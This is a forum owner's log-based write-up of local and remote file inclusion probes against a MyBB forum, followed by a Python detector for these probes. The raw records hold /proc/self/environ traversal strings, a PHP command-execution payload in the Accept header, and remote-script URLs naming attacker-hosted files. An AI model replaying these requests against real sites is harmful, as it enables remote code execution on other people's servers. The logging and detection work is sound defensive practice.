/proc/self/environ LFI and RFI vulnerability tests (since <= August 2011) | Joachim De Zutter
On the 28th of February 2012, it came to my attention that from IP addresses 201.79.83.41, 177.103.236.160 and 84.91.2.230, the showthread.php code of the MyBB forum was tested for execution of arbitrary commands through local file inclusion via the /proc/self/environ method.
---
Remote Address: 201.79.83.41 (201.79.83.41) Remote Port : 61541
Via: 
Forwarded For:  ()
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Request URI: /forum/myBB/showthread.php?tid=../../../../../../../../../../../../../../../../proc/self/environ
Protocol: HTTP/1.0
Accepted: <?php system('echo hacked123');exec('echo hacked123');shell_exec('echo hacked123');passthru('echo hacked123'); ?>
Accepted Language: en-us
Accepted Encoding: 
Accepted Charset: 
Connection: Keep-Alive
Proxy-connection: 
Referrer (ROT13): 
Date/Time: Tue Feb 28 1:37:38 CET 2012
---
Remote Address: 177.103.236.160 (DSL_ROUTE) Remote Port : 3379
Via: 
Forwarded For:  ()
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Request URI: /forum/myBB/showthread.php?tid=../../../../../../../../../../../../../../../../proc/self/environ
Protocol: HTTP/1.1
Accepted: <?php system('echo hacked123');exec('echo hacked123');shell_exec('echo hacked123');passthru('echo hacked123'); ?>
Accepted Language: en-us
Accepted Encoding: 
Accepted Charset: 
Connection: Keep-Alive
Proxy-connection: 
Referrer (ROT13): 
Date/Time: Tue Feb 28 1:52:29 CET 2012
---
Remote Address: 84.91.2.230 (pa1-84-91-2-230.netvisao.pt) Remote Port : 47672
Via: 1.0 ebox.example.com:3128 (squid/2.5.STABLE13)
Forwarded For: 172.31.20.63 (172.31.20.63)
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Request URI: /forum/myBB/showthread.php?tid=../../../../../../../../../../../../../../../../proc/self/environ
Protocol: HTTP/1.0
Accepted: <?php system('echo hacked123');exec('echo hacked123');shell_exec('echo hacked123');passthru('echo hacked123'); ?>
Accepted Language: en-us
Accepted Encoding: 
Accepted Charset: 
Connection: keep-alive
Proxy-connection: 
Referrer (ROT13): 
Date/Time: Tue Feb 28 17:23:00 CET 2012
---
http://www.utrace.de/?query=201.79.83.41
Provider: Telemar Norte Leste S.A., Region: Castelo (Brazil)

http://www.utrace.de/?query=177.103.236.160
Provider: TELECOMUNICACOES DE SAO PAULO S.A. - TELESP, Region: Guarujá (Brazil)

http://www.utrace.de/?query=84.91.2.230
Provider: Cabovisao, televisao por cabovisao, sa, Region: Mafra (Portugal)

On the 29th of February 2012, the vulnerability was tested again:
---
Remote Address: 189.79.26.92 (189-79-26-92.dsl.telesp.net.br) Remote Port : 14183
Via: 
Forwarded For:  ()
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Request URI: /forum/myBB/showthread.php?tid=../../../../../../../../../../../../../../../../proc/self/environ
Protocol: HTTP/1.0
Accepted: 
Accepted Language: en-us
Accepted Encoding: 
Accepted Charset: 
Connection: Keep-Alive
Proxy-connection: 
Referrer (ROT13): 
Date/Time: Wed Feb 29 21:28:05 CET 2012
---
http://www.utrace.de/?query=189.79.26.92
Provider: TELECOMUNICACOES DE SAO PAULO S.A. - TELESP, Region: Guarujá (Brazil)

On the 3rd of March 2012, a remote file inclusion (RFI) vulnerability test was performed by 200.98.167.194 using the PHP script at http://www.phs31sp.org.br/cmd.txt:
---
Remote Address: 200.98.167.194 (200-98-167-194.clouduol.com.br) Remote Port : 4885
Via: 
Forwarded For:  ()
User Agent: Mozilla/3.0 (compatible; Indy Library)
Request URI: /forum/mybb/showthread.php?tid=http://www.phs31sp.org.br/cmd.txt?
Protocol: HTTP/1.1
Accepted: text/html, */*
Accepted Language: 
Accepted Encoding: 
Accepted Charset: 
Connection: 
Proxy-connection: 
Referrer (ROT13): 
Date/Time: Sat Mar 3 13:15:12 CET 2012
---
http://www.utrace.de/?query=200.98.167.194
Provider: Universo Online S.A. (Brazil)

On the 29th of May 2012, a remote file inclusion (RFI) vulnerability test was performed by 200.40.88.142 using the PHP script at http://www.racia.fr/en/images/menu_12.txt, which in turn uses a PHP script at 69.64.49.239:
---
Remote Address: 200.40.88.142 (r200-40-88-142.ae-static.anteldata.net.uy) Remote Port : 21847
Via: 
Forwarded For:  ()
User Agent: 
Request URI: /forum/myBB/showthread.php?tid=http://www.racia.fr/en/images/menu_12.txt?&servidor=www.summumplus.be/forum/myBB/showthread.php?tid=&para=tirrom2020@gmail.com
Protocol: HTTP/1.1
Accepted: 
Accepted Language: 
Accepted Encoding: 
Accepted Charset: 
Connection: 
Proxy-connection: 
Referrer (ROT13): 
Date/Time: Tue May 29 23:08:52 CEST 2012
---
http://www.utrace.de/?query=200.40.88.142
Provider: Administracion Nacional de Telecomunicaciones (Montevideo, Uruguay)

http://www.utrace.de/?query=69.64.49.239
Provider: Hosting Solutions International (Saint Louis, United States)

On the 30th of May 2012, a remote file inclusion (RFI) vulnerability test was performed by 77.79.246.241 using the PHP script at http://www.dpsdhamtari.org/latest/uploadedResumes/iti.txt:
---
Remote Address: 77.79.246.241 (p23.progreso.pl) Remote Port : 38546
Via: 
Forwarded For:  ()
User Agent: 
Request URI: /forum/myBB/showthread.php?tid=http://www.dpsdhamtari.org/latest/uploadedResumes/iti.txt?&servidor=www.summumplus.be/forum/myBB/showthread.php?tid=&para=tirrom2020@gmail.com
Protocol: HTTP/1.1
Accepted: 
Accepted Language: 
Accepted Encoding: 
Accepted Charset: 
Connection: 
Proxy-connection: 
Referrer (ROT13): 
Date/Time: Wed May 30 7:07:40 CEST 2012
---
http://www.utrace.de/?query=77.79.246.241
Provider: ATM S.A. (Jastrzebie Zdroj, Poland)

On the 27th of October 2012, a remote file inclusion (RFI) vulnerability test was performed by 173.254.59.161 using the PHP script at http://www.navy.mil.kh/nbproject/project/private/enviador.txt:
---
Remote Address: 173.254.59.161 (173-254-59-161.rhostjh.com) Remote Port : 42185
Via: 
Forwarded For:  ()
User Agent: 
Request URI: /forum/myBB/showthread.php?tid=http://www.navy.mil.kh/nbproject/private/enviador.txt?&servidor=www.summumplus.be/forum/myBB/showthread.php?tid=&para=premmy35@gmail.com
Protocol: HTTP/1.1
Accepted: 
Accepted Language: 
Accepted Encoding: 
Accepted Charset: 
Connection: 
Proxy-connection: 
Referrer (ROT13): 
Date/Time: Sat Oct 27 18:17:33 CEST 2012
---
http://www.utrace.de/?query=173.254.59.161
Provider: Bluehost (Provo, United States)

On the 3rd of September 2011, a remote file inclusion (RFI) vulnerability test was performed with the same e-mail address (premmy35@gmail.com) by 216.155.72.42 using the PHP script at http://www.fpe.sn/webcam/enviador.txt:
---
Remote Address: 216.155.72.42 (doctor.taxista.cl) Remote Port : 54453
Via: 
Forwarded For:  ()
User Agent: 
Request URI: /forum/myBB/showthread.php?tid=http://www.fpe.sn/webcam/enviador.txt?&servidor=www.summumplus.be/forum/myBB/showthread.php?tid=&para=premmy35@gmail.com
Accepted: 
Accepted Language: 
Accepted Encoding: 
Accepted Charset: 
Referrer: 
Date/Time: Sat Sep 3 22:53:07 CEST 2011
---
http://www.utrace.de/?query=216.155.72.42
Provider: Telefonica del Sur S.A. (Valdivia, Chile)

On the 25th of October 2011, a remote file inclusion (RFI) vulnerability test was performed with the same e-mail address (premmy35@gmail.com) by 211.220.195.85 using the PHP script at http://www.sylt-architektur.de/_notes/Bots/enviador.txt:
---
Remote Address: 211.220.195.85 (211.220.195.85) Remote Port : 57721
Via: 
Forwarded For:  ()
User Agent: 
Request URI: /forum/myBB/showthread.php?tid=http://www.sylt-architektur.de/_notes/Bots/enviador.txt?&servidor=www.summumplus.be/forum/myBB/showthread.php?tid=&para=premmy35@gmail.com
Accepted: 
Accepted Language: 
Accepted Encoding: 
Accepted Charset: 
Referrer (ROT13): 
Date/Time: Tue Oct 25 9:35:37 CEST 2011
---
http://www.utrace.de/?query=211.220.195.85
Provider: Korea Telecom (Busan, Korea)

On the 19th of October 2012, an unknown attacker requested /proc/self/environ from (or via) IP 95.211.134.32:
---
Remote Address: 95.211.134.32 (ns1.tbyteweb.net) Remote Port : 53417 (BLACKLISTED AT STOP FORUM SPAM)
Via: 
Forwarded For:  ()
User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Request URI: /forum/myBB/index.php?option=com_abbrev&controller=..//..//..//..//..//..//..//..///proc/self/environ%0000
Protocol: HTTP/1.1
Accepted: 
Accepted Language: 
Accepted Encoding: 
Accepted Charset: 
Connection: TE, close
Proxy-connection: 
Referrer (ROT13): 
Date/Time: Fri Oct 19 7:24:09 CEST 2012
---
http://www.utrace.de/?query=95.211.134.32
Provider: LeaseWeb B.V. (Deventer, The Netherlands)

Shortly afterwards there was a similar request from (or via) IP 46.254.17.117:
---
Remote Address: 46.254.17.117 (www.moyserv.ru) Remote Port : 34803
Via: 
Forwarded For:  ()
User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Request URI: /forum/myBB/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000
Protocol: HTTP/1.1
Accepted: 
Accepted Language: 
Accepted Encoding: 
Accepted Charset: 
Connection: TE, close
Proxy-connection: 
Referrer (ROT13): 
Date/Time: Fri Oct 19 7:27:49 CEST 2012
---
http://www.utrace.de/?query=46.254.17.117
Provider: Internet-Hosting Ltd, Organisation: IHC.RU network in Eserver.ru (Russia)

Followed by another request:
---
Remote Address: 95.211.134.32 (ns1.tbyteweb.net) Remote Port : 33439 (BLACKLISTED AT STOP FORUM SPAM)
Via: 
Forwarded For:  ()
User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Request URI: /forum/myBB/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000
Protocol: HTTP/1.1
Accepted: 
Accepted Language: 
Accepted Encoding: 
Accepted Charset: 
Connection: TE, close
Proxy-connection: 
Referrer (ROT13): 
Date/Time: Fri Oct 19 7:42:29 CEST 2012
---

We also found the following entries in our logs:
189.114.93.100, 8/20/2011, 20:26:32, GET, /matchmaker/forum/adminLogin.php, config[forum_installed]=../../../../../../../../../../../../../../../proc/self/environ%00
189.114.93.100, 8/20/2011, 20:26:33, GET, /forum/adminLogin.php, config[forum_installed]=../../../../../../../../../../../../../../../proc/self/environ%00
189.114.93.100, 8/20/2011, 20:47:38, GET, /matchmaker/forum/adminLogin.php, config[forum_installed]=../../../../../../../../../../../../../../../proc/self/environ%00
189.114.93.100, 8/20/2011, 20:47:39, GET, /forum/adminLogin.php, config[forum_installed]=../../../../../../../../../../../../../../../proc/self/environ%00
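All of the probes recorded above share two signatures that a defender can alert on: a chain of `../` ending in `/proc/self/environ` (sometimes followed by a `%00` null byte, sometimes with `..//` slash-doubling) in a parameter that should only ever hold a thread id, and a parameter whose value is itself a remote URL. As an added example, not the author's own log tooling, the following Python script parses both log formats shown on this page (the "Remote Address: ... / Request URI: ..." records separated by `---`, and the comma-separated entries just above) and tags each request with the indicators it carries. It also shows the allow-list check that stops such input before it reaches an include or file-system call. All sample records, host names and the 198.51.100.0/24 addresses are constructed for the example, and the "tid must be a positive integer" rule is an assumption made here, not a statement about MyBB's code.

```python
"""Added example (not the page author's code): detection logic for the
/proc/self/environ LFI probes and the RFI probes recorded on this page.
All sample input below is constructed for the example, not real traffic."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

TRAVERSAL_RE = re.compile(r"(\.\./){2,}")                 # repeated "../" climbing
REMOTE_SCHEME_RE = re.compile(r"^(https?|ftp)://", re.I)  # value is a remote URL
REMOTE_ADDR_RE = re.compile(r"^Remote Address:\s*([\d.]+)")


def classify_uri(uri: str) -> set:
    """Indicator tags for one request URI; an empty set means nothing suspicious."""
    decoded = unquote(unquote(uri))                 # twice: catches double encoding
    collapsed = re.sub(r"/{2,}", "/", decoded)      # "..//..//" compares like "../../"
    tags = set()
    if "\x00" in decoded:
        tags.add("null-byte")                       # %00 to cut off an appended suffix
    if TRAVERSAL_RE.search(collapsed):
        tags.add("path-traversal")
    if "/proc/self/environ" in collapsed:
        tags.add("lfi-proc-environ")                # include() of the process environment
    # RFI check runs on the uncollapsed form so "http://" survives intact.
    for _key, value in parse_qsl(urlsplit(decoded).query, keep_blank_values=True):
        if REMOTE_SCHEME_RE.match(value.strip()):
            tags.add("rfi")                         # parameter carries a remote URL
    return tags


def parse_csv_log(line: str):
    """'ip, date, time, method, path, query' -> (ip, uri), the last format above."""
    ip, _date, _time, _method, path, query = line.split(", ", 5)
    return ip, f"{path}?{query}" if query else path


def parse_record_dump(text: str):
    """Yield (ip, uri) from 'Remote Address: ... / Request URI: ...' records; the URI
    may sit on the line after 'Request URI:' as in some records on the page."""
    ip, pending = None, False
    for raw in text.splitlines():
        line = raw.strip()
        m = REMOTE_ADDR_RE.match(line)
        if m:
            ip = m.group(1)
        elif line.startswith("Request URI:"):
            uri = line[len("Request URI:"):].strip()
            pending = not uri
            if uri and ip:
                yield ip, uri
        elif pending and line.startswith("/"):
            pending = False
            yield ip, line


def scan(pairs):
    """Return [(ip, uri, sorted tags)] for every request carrying an indicator."""
    hits = []
    for ip, uri in pairs:
        tags = classify_uri(uri)
        if tags:
            hits.append((ip, uri, sorted(tags)))
    return hits


def is_valid_thread_id(value: str) -> bool:
    """Allow-list check for a parameter like showthread.php's tid: a positive integer
    only (assumption for this example), so a path or URL never reaches include()."""
    return value.isdigit() and int(value) > 0


# Constructed sample input modelled on the formats above (documentation IPs, no real hosts).
SAMPLE_DUMP = """\
Remote Address: 198.51.100.7 (host-a.example) Remote Port : 61541
Request URI: /forum/myBB/showthread.php?tid=../../../../../../../../proc/self/environ
---
Remote Address: 198.51.100.8 (host-b.example) Remote Port : 4885
Request URI: /forum/myBB/showthread.php?tid=http://attacker.example/cmd.txt?&servidor=x&para=y
---
Remote Address: 198.51.100.9 (host-c.example) Remote Port : 53417
Request URI:
/forum/myBB/index.php?option=com_abbrev&controller=..//..//..//..///proc/self/environ%0000
---
Remote Address: 198.51.100.10 (host-d.example) Remote Port : 1234
Request URI: /forum/myBB/showthread.php?tid=1234
"""
SAMPLE_CSV = [
    "198.51.100.11, 8/20/2011, 20:26:32, GET, /forum/adminLogin.php, config[forum_installed]=../../../../../../proc/self/environ%00",
    "198.51.100.12, 8/20/2011, 20:27:00, GET, /forum/index.php, ",
]


def run_samples():
    """Scan both constructed samples; only the four probing requests are returned."""
    pairs = list(parse_record_dump(SAMPLE_DUMP)) + [parse_csv_log(l) for l in SAMPLE_CSV]
    return scan(pairs)


if __name__ == "__main__":
    for ip, uri, tags in run_samples():
        print(ip, ",".join(tags), uri)
```

The benign `tid=1234` request and the empty-query entry produce no tags, so the output is only the four probes. The traversal and `/proc/self/environ` checks run on the slash-collapsed form so that the `..//..//` variant seen on the 19th of October 2012 is caught, while the RFI check runs on the merely decoded form so the `http://` in a parameter value is not collapsed away.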